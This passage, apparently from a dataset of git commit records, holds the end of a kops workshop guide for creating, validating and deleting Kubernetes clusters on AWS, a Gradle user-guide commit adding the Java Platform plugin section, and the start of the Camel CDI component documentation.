kube-apiserver-ip-172-20-117-32.ec2.internal 1\/1 Running 0 7m\n kube-system kube-apiserver-ip-172-20-62-108.ec2.internal 1\/1 Running 6 16m\n kube-system kube-apiserver-ip-172-20-79-64.ec2.internal 1\/1 Running 2 12m\n\nThe output shows three pods, one each for API server, corresponding to the three master nodes. This output is from a cluster with three master nodes. 
The output may be different if your cluster was created with different number of masters.\n\nSearch for the `--runtime-config` option as shown:\n\n $ kubectl describe --namespace=kube-system pod <pod-name> | grep runtime\n\n`<pod-name>` is name of one of the pods shown above.\n\nA formatted output is shown below:\n\n \/usr\/local\/bin\/kube-apiserver \\\n --address=127.0.0.1 \\\n --admission-control=NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,DefaultTolerationSeconds,ResourceQuota \\\n --allow-privileged=true \\\n --anonymous-auth=false \\\n --apiserver-count=3 \\\n --authorization-mode=AlwaysAllow \\\n --basic-auth-file=\/srv\/kubernetes\/basic_auth.csv \\\n --client-ca-file=\/srv\/kubernetes\/ca.crt \\\n --cloud-provider=aws \\\n --etcd-servers-overrides=\/events#http:\/\/127.0.0.1:4002 \\\n --etcd-servers=http:\/\/127.0.0.1:4001 --insecure-port=8080 --kubelet-preferred-address-types=InternalIP,Hostname,ExternalIP \\\n --runtime-config=batch\/v2alpha1=true \\\n --secure-port=443 \\\n --service-cluster-ip-range=100.64.0.0\/13 \\\n --storage-backend=etcd2 \\\n --tls-cert-file=\/srv\/kubernetes\/server.cert \\\n --tls-private-key-file=\/srv\/kubernetes\/server.key \\\n --token-auth-file=\/srv\/kubernetes\/known_tokens.csv \\\n --v=2 \\\n 1>>\/var\/log\/kube-apiserver.log 2>&1\n\nThe output clearly shows that `--runtime-config=batch\/v2alpha1=true` is passed as an option to the API server. This means the cluster is now ready for creating creating APIs with version `batch\/v2alpha1`.\n\n== Instance Groups with kops\n\nAn instance group, or ig for short, is a kops concept that defines a grouping of similar nodes. In AWS, an instance group maps to an Auto Scaling Group (ASG). Instructions on how to create instance groups can be found link:instance-groups\/readme.adoc[here].\n\n== Delete A Cluster\n\nAny cluster can be deleted as shown:\n\n $ kops delete cluster \\\n <cluster-name> \\\n --yes\n\n`<cluster-name>` is the name of the cluster. For example, our `example.cluster.k8s.local` cluster can be deleted as:\n\n $ kops delete cluster \\\n example.cluster.k8s.local \\\n --yes\n\nIf you leave off the `--yes` flag, you will get a listing of all the resources kops will delete. To confirm deletion, run the command again appending `--yes`.\n\nIf you created a private VPC, then an additional cleanup of resources is required as shown below:\n\n # Find Route53 hosted zone ID from the console or via CLI and delete hosted zone\n aws route53 delete-hosted-zone --id $ZONEID\n # Delete VPC if you created earlier\n $ aws ec2 detach-internet-gateway --internet $IGW --vpc $VPCID\n aws ec2 delete-internet-gateway --internet-gateway-id $IGW\n aws ec2 delete-vpc --vpc-id $VPCID\n\nTo remove the state store S3 bucket:\n\n aws s3 rb $KOPS_STATE_STORE\n\n== Appendix: Create a DNS-based Kubernetes cluster\n\nTo create a DNS-based Kubernetes cluster you'll need a top-level domain or subdomain that meets one of the following scenarios:\n\n. Domain purchased\/hosted via AWS\n. A subdomain under a domain purchased\/hosted via AWS\n. Setting up Route53 for a domain purchased with another registrar, transfering the domain to Route53\n. Subdomain for clusters in Route53, leaving the domain at another registrar\n\nThen you need to follow the instructions in https:\/\/github.com\/kubernetes\/kops\/blob\/master\/docs\/aws.md#configure-dns[configure DNS]. 
Typically, the first and the last bullets are common scenarios.\n\n==== Default DNS-based cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. For the purposes of this demonstration, we will use a cluster name of example.cluster.com as our registered DNS. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding `--yes` option ensures that the cluster is immediately created as well.\n\nAlternatively, you may leave off the `--yes` option from the `kops create cluster` command. This will allow you to use `kops edit cluster example.cluster.com` command to view the current cluster state and make changes before actually creating the cluster. \n\nThe cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.com --yes\n\nOnce the `kops create cluster` or `kops update cluster` command is issued with the `--yes` flag,, it provisions the EC2 instances, setup Auto Scaling Groups, IAM users, security groups, and install Kubernetes on each node, configures master and worker nodes. This process can take a few minutes based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-51-232.ec2.internal node True\nip-172-20-60-192.ec2.internal master True\nip-172-20-91-39.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nVerify the client and server version:\n\n $ kubectl version\n Client Version: version.Info{Major:\"1\", Minor:\"8\", GitVersion:\"v1.8.1\", GitCommit:\"f38e43b221d08850172a9a4ea785a86a3ffa3b3a\", GitTreeState:\"clean\", BuildDate:\"2017-10-12T00:45:05Z\", GoVersion:\"go1.9.1\", Compiler:\"gc\", Platform:\"darwin\/amd64\"}\n Server Version: version.Info{Major:\"1\", Minor:\"7\", GitVersion:\"v1.7.4\", GitCommit:\"793658f2d7ca7f064d2bdf606519f9fe1229c381\", GitTreeState:\"clean\", BuildDate:\"2017-08-17T08:30:51Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\nIt shows that Kubectl CLI version is 1.8.1 and the server version is 1.7.4. Cluster version may changed depending on kops version.\n\n==== Multi-master, multi-node, multi-az DNS-based cluster\n\nCheck the list of Availability Zones that exist for your region using the following command:\n\n $ aws --region <region> ec2 describe-availability-zones\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in\none step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. 
Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\n`--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nAs mentioned above, wait for 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-103-30.ec2.internal master True\nip-172-20-105-16.ec2.internal node True\nip-172-20-127-147.ec2.internal node True\nip-172-20-35-38.ec2.internal node True\nip-172-20-47-199.ec2.internal node True\nip-172-20-61-207.ec2.internal master True\nip-172-20-75-78.ec2.internal master True\nip-172-20-94-216.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ from the one shown here based up on the type of cluster you created.\n\nYou are now ready to link:..\/103-kubernetes-concepts[continue on with the workshop.]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62013d9dd964745cf82a3d06981a546e9f8d7840","subject":"Add missing \"Java Platform plugin\" section in userguide","message":"Add missing \"Java Platform plugin\" section in userguide\n","repos":"robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/userguide_single.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/userguide_single.adoc","new_contents":"\/\/ Copyright 2018 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n= Gradle User Manual: Version {gradleVersion}\n:description: Single-page Gradle User Manual for Gradle {gradleVersion}\n:meta-name-robots: noindex\n:meta-name-twitter_card: summary\n:meta-name-twitter_site: @gradle\n:meta-name-twitter_creator: @gradle\n:meta-name-twitter_title: {doctitle}\n:meta-name-twitter_description: {description}\n:meta-name-twitter_url: {docsUrl}\/{gradleVersion}\/userguide\/{docname}.html\n:meta-name-twitter_image: 
{website}\/images\/gradle-256x256.png\n\ntoc::[]\n\n[[part:about_gradle]]\n== About Gradle\n\ninclude::overview.adoc[leveloffset=+2]\n\ninclude::what_is_gradle.adoc[leveloffset=+2]\n\n[[part:getting_started]]\n== Getting Started\n\ninclude::getting_started.adoc[leveloffset=2]\n\ninclude::installation.adoc[leveloffset=+2]\n\ninclude::troubleshooting.adoc[leveloffset=+2]\n\n[[part:upgrading_and_migrating]]\n== Upgrading and Migrating\n\ninclude::upgrading_version_5.adoc[leveloffset=+2]\ninclude::upgrading_version_4.adoc[leveloffset=+2]\n\ninclude::migrating_from_ant.adoc[leveloffset=+2]\n\n[[part:running_builds]]\n== Running Gradle Builds\n\ninclude::build_environment.adoc[leveloffset=+2]\n\ninclude::gradle_daemon.adoc[leveloffset=+2]\n\ninclude::init_scripts.adoc[leveloffset=+2]\n\ninclude::intro_multi_project_builds.adoc[leveloffset=+2]\n\ninclude::build_cache.adoc[leveloffset=+2]\n\ninclude::composite_builds.adoc[leveloffset=+2]\n\n[[part:authoring_builds]]\n== Authoring Gradle Builds\n\ninclude::tutorial_using_tasks.adoc[leveloffset=+2]\n\ninclude::more_about_tasks.adoc[leveloffset=+2]\n\ninclude::writing_build_scripts.adoc[leveloffset=+2]\n\ninclude::working_with_files.adoc[leveloffset=+2]\n\ninclude::custom_tasks.adoc[leveloffset=+2]\n\ninclude::plugins.adoc[leveloffset=+2]\n\ninclude::build_lifecycle.adoc[leveloffset=+2]\n\ninclude::logging.adoc[leveloffset=+2]\n\ninclude::multi_project_builds.adoc[leveloffset=+2]\n\ninclude::organizing_gradle_projects.adoc[leveloffset=+2]\n\ninclude::authoring_maintainable_build_scripts.adoc[leveloffset=+2]\n\ninclude::lazy_configuration.adoc[leveloffset=+2]\n\ninclude::test_kit.adoc[leveloffset=+2]\n\ninclude::ant.adoc[leveloffset=+2]\n\n[[part:dependency_management]]\n== Dependency Management\n\ninclude::introduction_dependency_management.adoc[leveloffset=+2]\n\ninclude::dependency_management_terminology.adoc[leveloffset=+2]\n\ninclude::dependency_types.adoc[leveloffset=+2]\n\ninclude::repository_types.adoc[leveloffset=+2]\n\ninclude::declaring_dependencies.adoc[leveloffset=+2]\n\ninclude::declaring_repositories.adoc[leveloffset=+2]\n\ninclude::inspecting_dependencies.adoc[leveloffset=+2]\n\ninclude::managing_dependency_configurations.adoc[leveloffset=+2]\n\ninclude::managing_transitive_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_locking.adoc[leveloffset=+2]\n\ninclude::troubleshooting_dependency_resolution.adoc[leveloffset=+2]\n\ninclude::customizing_dependency_resolution_behavior.adoc[leveloffset=+2]\n\ninclude::dependency_cache.adoc[leveloffset=+2]\n\ninclude::working_with_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_management_attribute_based_matching.adoc[leveloffset=+2]\n\n[[part:publishing]]\n== Publishing Artifacts\n\ninclude::publishing_overview.adoc[leveloffset=+2]\n\ninclude::artifact_management.adoc[leveloffset=+2]\n\n[[part:jvm_projects]]\n== Java & Other JVM Projects\n\ninclude::building_java_projects.adoc[leveloffset=+2]\n\ninclude::java_testing.adoc[leveloffset=+2]\n\ninclude::dependency_management_for_java_projects.adoc[leveloffset=+2]\n\n[[part:native_projects]]\n== Native Projects\n\ninclude::native_software.adoc[leveloffset=+2]\n\ninclude::software_model_concepts.adoc[leveloffset=+2]\n\ninclude::software_model.adoc[leveloffset=+2]\n\ninclude::rule_source.adoc[leveloffset=+2]\n\ninclude::software_model_extend.adoc[leveloffset=+2]\n\n[[part:extending_gradle]]\n== Extending 
Gradle\n\ninclude::custom_plugins.adoc[leveloffset=+2]\n\ninclude::java_gradle_plugin.adoc[leveloffset=+2]\n\ninclude::embedding.adoc[leveloffset=+2]\n\n[[part:reference]]\n== Reference\n\ninclude::groovy_build_script_primer.adoc[leveloffset=+2]\n\ninclude::kotlin_dsl.adoc[leveloffset=+2]\n\ninclude::plugin_reference.adoc[leveloffset=2]\n\ninclude::command_line_interface.adoc[leveloffset=+2]\n\ninclude::third_party_integration.adoc[leveloffset=2]\n\ninclude::gradle_wrapper.adoc[leveloffset=+2]\n\ninclude::directory_layout.adoc[leveloffset=+2]\n\n[[part:plugins]]\n== Plugins\n\ninclude::antlr_plugin.adoc[leveloffset=+2]\n\ninclude::application_plugin.adoc[leveloffset=+2]\n\ninclude::base_plugin.adoc[leveloffset=+2]\n\ninclude::build_init_plugin.adoc[leveloffset=+2]\n\ninclude::checkstyle_plugin.adoc[leveloffset=+2]\n\ninclude::codenarc_plugin.adoc[leveloffset=+2]\n\ninclude::distribution_plugin.adoc[leveloffset=+2]\n\ninclude::ear_plugin.adoc[leveloffset=+2]\n\ninclude::eclipse_plugin.adoc[leveloffset=+2]\n\ninclude::findbugs_plugin.adoc[leveloffset=+2]\n\ninclude::groovy_plugin.adoc[leveloffset=+2]\n\ninclude::idea_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_ivy.adoc[leveloffset=+2]\n\ninclude::jacoco_plugin.adoc[leveloffset=+2]\n\ninclude::java_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_distribution_plugin.adoc[leveloffset=+2]\n\ninclude::java_platform_plugin.adoc[leveloffset=+2]\n\ninclude::jdepend_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_maven.adoc[leveloffset=+2]\n\ninclude::maven_plugin.adoc[leveloffset=+2]\n\ninclude::osgi_plugin.adoc[leveloffset=+2]\n\ninclude::play_plugin.adoc[leveloffset=+2]\n\ninclude::pmd_plugin.adoc[leveloffset=+2]\n\ninclude::scala_plugin.adoc[leveloffset=+2]\n\ninclude::signing_plugin.adoc[leveloffset=+2]\n\ninclude::war_plugin.adoc[leveloffset=+2]\n\n== License Information\n\ninclude::licenses.adoc[leveloffset=+1]\n","old_contents":"\/\/ Copyright 2018 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n= Gradle User Manual: Version {gradleVersion}\n:description: Single-page Gradle User Manual for Gradle {gradleVersion}\n:meta-name-robots: noindex\n:meta-name-twitter_card: summary\n:meta-name-twitter_site: @gradle\n:meta-name-twitter_creator: @gradle\n:meta-name-twitter_title: {doctitle}\n:meta-name-twitter_description: {description}\n:meta-name-twitter_url: {docsUrl}\/{gradleVersion}\/userguide\/{docname}.html\n:meta-name-twitter_image: {website}\/images\/gradle-256x256.png\n\ntoc::[]\n\n[[part:about_gradle]]\n== About Gradle\n\ninclude::overview.adoc[leveloffset=+2]\n\ninclude::what_is_gradle.adoc[leveloffset=+2]\n\n[[part:getting_started]]\n== Getting Started\n\ninclude::getting_started.adoc[leveloffset=2]\n\ninclude::installation.adoc[leveloffset=+2]\n\ninclude::troubleshooting.adoc[leveloffset=+2]\n\n[[part:upgrading_and_migrating]]\n== Upgrading and 
Migrating\n\ninclude::upgrading_version_5.adoc[leveloffset=+2]\ninclude::upgrading_version_4.adoc[leveloffset=+2]\n\ninclude::migrating_from_ant.adoc[leveloffset=+2]\n\n[[part:running_builds]]\n== Running Gradle Builds\n\ninclude::build_environment.adoc[leveloffset=+2]\n\ninclude::gradle_daemon.adoc[leveloffset=+2]\n\ninclude::init_scripts.adoc[leveloffset=+2]\n\ninclude::intro_multi_project_builds.adoc[leveloffset=+2]\n\ninclude::build_cache.adoc[leveloffset=+2]\n\ninclude::composite_builds.adoc[leveloffset=+2]\n\n[[part:authoring_builds]]\n== Authoring Gradle Builds\n\ninclude::tutorial_using_tasks.adoc[leveloffset=+2]\n\ninclude::more_about_tasks.adoc[leveloffset=+2]\n\ninclude::writing_build_scripts.adoc[leveloffset=+2]\n\ninclude::working_with_files.adoc[leveloffset=+2]\n\ninclude::custom_tasks.adoc[leveloffset=+2]\n\ninclude::plugins.adoc[leveloffset=+2]\n\ninclude::build_lifecycle.adoc[leveloffset=+2]\n\ninclude::logging.adoc[leveloffset=+2]\n\ninclude::multi_project_builds.adoc[leveloffset=+2]\n\ninclude::organizing_gradle_projects.adoc[leveloffset=+2]\n\ninclude::authoring_maintainable_build_scripts.adoc[leveloffset=+2]\n\ninclude::lazy_configuration.adoc[leveloffset=+2]\n\ninclude::test_kit.adoc[leveloffset=+2]\n\ninclude::ant.adoc[leveloffset=+2]\n\n[[part:dependency_management]]\n== Dependency Management\n\ninclude::introduction_dependency_management.adoc[leveloffset=+2]\n\ninclude::dependency_management_terminology.adoc[leveloffset=+2]\n\ninclude::dependency_types.adoc[leveloffset=+2]\n\ninclude::repository_types.adoc[leveloffset=+2]\n\ninclude::declaring_dependencies.adoc[leveloffset=+2]\n\ninclude::declaring_repositories.adoc[leveloffset=+2]\n\ninclude::inspecting_dependencies.adoc[leveloffset=+2]\n\ninclude::managing_dependency_configurations.adoc[leveloffset=+2]\n\ninclude::managing_transitive_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_locking.adoc[leveloffset=+2]\n\ninclude::troubleshooting_dependency_resolution.adoc[leveloffset=+2]\n\ninclude::customizing_dependency_resolution_behavior.adoc[leveloffset=+2]\n\ninclude::dependency_cache.adoc[leveloffset=+2]\n\ninclude::working_with_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_management_attribute_based_matching.adoc[leveloffset=+2]\n\n[[part:publishing]]\n== Publishing Artifacts\n\ninclude::publishing_overview.adoc[leveloffset=+2]\n\ninclude::artifact_management.adoc[leveloffset=+2]\n\n[[part:jvm_projects]]\n== Java & Other JVM Projects\n\ninclude::building_java_projects.adoc[leveloffset=+2]\n\ninclude::java_testing.adoc[leveloffset=+2]\n\ninclude::dependency_management_for_java_projects.adoc[leveloffset=+2]\n\n[[part:native_projects]]\n== Native Projects\n\ninclude::native_software.adoc[leveloffset=+2]\n\ninclude::software_model_concepts.adoc[leveloffset=+2]\n\ninclude::software_model.adoc[leveloffset=+2]\n\ninclude::rule_source.adoc[leveloffset=+2]\n\ninclude::software_model_extend.adoc[leveloffset=+2]\n\n[[part:extending_gradle]]\n== Extending Gradle\n\ninclude::custom_plugins.adoc[leveloffset=+2]\n\ninclude::java_gradle_plugin.adoc[leveloffset=+2]\n\ninclude::embedding.adoc[leveloffset=+2]\n\n[[part:reference]]\n== 
Reference\n\ninclude::groovy_build_script_primer.adoc[leveloffset=+2]\n\ninclude::kotlin_dsl.adoc[leveloffset=+2]\n\ninclude::plugin_reference.adoc[leveloffset=2]\n\ninclude::command_line_interface.adoc[leveloffset=+2]\n\ninclude::third_party_integration.adoc[leveloffset=2]\n\ninclude::gradle_wrapper.adoc[leveloffset=+2]\n\ninclude::directory_layout.adoc[leveloffset=+2]\n\n[[part:plugins]]\n== Plugins\n\ninclude::antlr_plugin.adoc[leveloffset=+2]\n\ninclude::application_plugin.adoc[leveloffset=+2]\n\ninclude::base_plugin.adoc[leveloffset=+2]\n\ninclude::build_init_plugin.adoc[leveloffset=+2]\n\ninclude::checkstyle_plugin.adoc[leveloffset=+2]\n\ninclude::codenarc_plugin.adoc[leveloffset=+2]\n\ninclude::distribution_plugin.adoc[leveloffset=+2]\n\ninclude::ear_plugin.adoc[leveloffset=+2]\n\ninclude::eclipse_plugin.adoc[leveloffset=+2]\n\ninclude::findbugs_plugin.adoc[leveloffset=+2]\n\ninclude::groovy_plugin.adoc[leveloffset=+2]\n\ninclude::idea_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_ivy.adoc[leveloffset=+2]\n\ninclude::jacoco_plugin.adoc[leveloffset=+2]\n\ninclude::java_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_distribution_plugin.adoc[leveloffset=+2]\n\ninclude::jdepend_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_maven.adoc[leveloffset=+2]\n\ninclude::maven_plugin.adoc[leveloffset=+2]\n\ninclude::osgi_plugin.adoc[leveloffset=+2]\n\ninclude::play_plugin.adoc[leveloffset=+2]\n\ninclude::pmd_plugin.adoc[leveloffset=+2]\n\ninclude::scala_plugin.adoc[leveloffset=+2]\n\ninclude::signing_plugin.adoc[leveloffset=+2]\n\ninclude::war_plugin.adoc[leveloffset=+2]\n\n== License Information\n\ninclude::licenses.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd84f3857d87b26543989bede3d953dadbd48cf6","subject":"Camel CDI: update testing container versions in documentation","message":"Camel CDI: update testing container versions in 
documentation\n","repos":"isavin\/camel,Thopap\/camel,tadayosi\/camel,gautric\/camel,rmarting\/camel,curso007\/camel,akhettar\/camel,ullgren\/camel,anton-k11\/camel,gautric\/camel,tadayosi\/camel,mgyongyosi\/camel,acartapanis\/camel,gautric\/camel,pax95\/camel,prashant2402\/camel,dmvolod\/camel,zregvart\/camel,Fabryprog\/camel,anoordover\/camel,pmoerenhout\/camel,nboukhed\/camel,apache\/camel,prashant2402\/camel,anton-k11\/camel,pmoerenhout\/camel,mgyongyosi\/camel,nboukhed\/camel,mgyongyosi\/camel,Thopap\/camel,kevinearls\/camel,dmvolod\/camel,tlehoux\/camel,nboukhed\/camel,rmarting\/camel,cunningt\/camel,prashant2402\/camel,dmvolod\/camel,tdiesler\/camel,pax95\/camel,DariusX\/camel,pkletsko\/camel,christophd\/camel,onders86\/camel,DariusX\/camel,CodeSmell\/camel,CodeSmell\/camel,anoordover\/camel,onders86\/camel,scranton\/camel,scranton\/camel,pmoerenhout\/camel,kevinearls\/camel,ullgren\/camel,isavin\/camel,CodeSmell\/camel,tdiesler\/camel,adessaigne\/camel,prashant2402\/camel,DariusX\/camel,tlehoux\/camel,Fabryprog\/camel,scranton\/camel,snurmine\/camel,acartapanis\/camel,acartapanis\/camel,pax95\/camel,dmvolod\/camel,alvinkwekel\/camel,jonmcewen\/camel,adessaigne\/camel,ullgren\/camel,rmarting\/camel,prashant2402\/camel,cunningt\/camel,prashant2402\/camel,adessaigne\/camel,curso007\/camel,nikhilvibhav\/camel,scranton\/camel,christophd\/camel,kevinearls\/camel,zregvart\/camel,anton-k11\/camel,curso007\/camel,gnodet\/camel,cunningt\/camel,gnodet\/camel,pmoerenhout\/camel,adessaigne\/camel,sverkera\/camel,nboukhed\/camel,isavin\/camel,kevinearls\/camel,cunningt\/camel,drsquidop\/camel,tadayosi\/camel,DariusX\/camel,Thopap\/camel,apache\/camel,tdiesler\/camel,pkletsko\/camel,objectiser\/camel,yuruki\/camel,pkletsko\/camel,nicolaferraro\/camel,objectiser\/camel,akhettar\/camel,rmarting\/camel,isavin\/camel,jonmcewen\/camel,acartapanis\/camel,zregvart\/camel,alvinkwekel\/camel,akhettar\/camel,yuruki\/camel,davidkarlsen\/camel,anoordover\/camel,apache\/camel,punkhorn\/camel-upstream,sverkera\/camel,akhettar\/camel,tadayosi\/camel,cunningt\/camel,sverkera\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,curso007\/camel,kevinearls\/camel,onders86\/camel,yuruki\/camel,punkhorn\/camel-upstream,pax95\/camel,anton-k11\/camel,zregvart\/camel,tdiesler\/camel,drsquidop\/camel,mcollovati\/camel,pkletsko\/camel,christophd\/camel,snurmine\/camel,yuruki\/camel,drsquidop\/camel,pmoerenhout\/camel,davidkarlsen\/camel,Thopap\/camel,yuruki\/camel,apache\/camel,sverkera\/camel,nicolaferraro\/camel,anton-k11\/camel,mgyongyosi\/camel,akhettar\/camel,gautric\/camel,jamesnetherton\/camel,anoordover\/camel,onders86\/camel,nikhilvibhav\/camel,nboukhed\/camel,tlehoux\/camel,isavin\/camel,dmvolod\/camel,objectiser\/camel,pkletsko\/camel,tlehoux\/camel,adessaigne\/camel,scranton\/camel,salikjan\/camel,jamesnetherton\/camel,scranton\/camel,davidkarlsen\/camel,jamesnetherton\/camel,christophd\/camel,apache\/camel,mcollovati\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,anoordover\/camel,pmoerenhout\/camel,isavin\/camel,salikjan\/camel,christophd\/camel,acartapanis\/camel,gnodet\/camel,ullgren\/camel,nikhilvibhav\/camel,sverkera\/camel,apache\/camel,punkhorn\/camel-upstream,pax95\/camel,davidkarlsen\/camel,nboukhed\/camel,jamesnetherton\/camel,curso007\/camel,Thopap\/camel,dmvolod\/camel,sverkera\/camel,Fabryprog\/camel,mgyongyosi\/camel,mcollovati\/camel,CodeSmell\/camel,Fabryprog\/camel,akhettar\/camel,nicolaferraro\/camel,snurmine\/camel,mgyongyosi\/camel,gautric\/camel,nicolaferraro\
/camel,jonmcewen\/camel,drsquidop\/camel,kevinearls\/camel,tadayosi\/camel,drsquidop\/camel,snurmine\/camel,snurmine\/camel,rmarting\/camel,jamesnetherton\/camel,pkletsko\/camel,gnodet\/camel,alvinkwekel\/camel,tlehoux\/camel,yuruki\/camel,pax95\/camel,gautric\/camel,jonmcewen\/camel,tadayosi\/camel,objectiser\/camel,snurmine\/camel,curso007\/camel,anoordover\/camel,christophd\/camel,Thopap\/camel,rmarting\/camel,acartapanis\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,onders86\/camel,tlehoux\/camel,onders86\/camel,cunningt\/camel,tdiesler\/camel,anton-k11\/camel,jonmcewen\/camel,drsquidop\/camel,gnodet\/camel","old_file":"components\/camel-cdi\/src\/main\/docs\/cdi.adoc","new_file":"components\/camel-cdi\/src\/main\/docs\/cdi.adoc","new_contents":"## Camel CDI\n\nThe Camel CDI component provides auto-configuration for Apache Camel\nusing CDI as dependency injection framework based\non\u00a0_convention-over-configuration_. It auto-detects Camel routes\navailable in the application and provides beans for common Camel\nprimitives like `Endpoint`,\u00a0`FluentProducerTemplate`, `ProducerTemplate` or\u00a0`TypeConverter`. It\nimplements standard link:bean-integration.html[Camel bean integration]\nso that Camel annotations like\u00a0`@Consume`,\u00a0`@Produce`\nand\u00a0`@PropertyInject` can be used seamlessly in CDI beans. Besides, it\nbridges Camel events (e.g. `RouteAddedEvent`,\n`CamelContextStartedEvent`,\u00a0`ExchangeCompletedEvent`, ...) as CDI events\nand provides a CDI events endpoint that can be used to consume \/ produce\nCDI events from \/ to Camel routes.\n\nNOTE: While the Camel CDI component is available as of **Camel 2.10**, it's\nbeen rewritten in *Camel 2.17* to better fit into the CDI programming\nmodel. Hence some of the features like the Camel events to CDI events\nbridge and the CDI events endpoint only apply starting Camel 2.17.\n\nNOTE: More details on how to test Camel CDI applications are available in\nlink:cdi-testing.html[Camel CDI testing].\n\n### Auto-configured Camel context\n\nCamel CDI automatically deploys and configures a\u00a0`CamelContext` bean.\nThat `CamelContext` bean is automatically instantiated, configured and\nstarted (resp. stopped) when the CDI container initializes (resp. shuts\ndown). It can be injected in the application, e.g.:\n\n[source,java]\n----\n@Inject\nCamelContext context;\n----\n\nThat default `CamelContext` bean is qualified with the\nbuilt-in\u00a0`@Default` qualifier, is scoped\u00a0`@ApplicationScoped` and is of\ntype `DefaultCamelContext`.\n\nNote that this bean can be customized programmatically and other Camel\ncontext beans can be deployed in the application as well.\n\n### Auto-detecting Camel routes\n\nCamel CDI automatically\u00a0collects all the\u00a0`RoutesBuilder` beans in the\napplication, instantiates and add them to the `CamelContext` bean\ninstance when the CDI container initializes. 
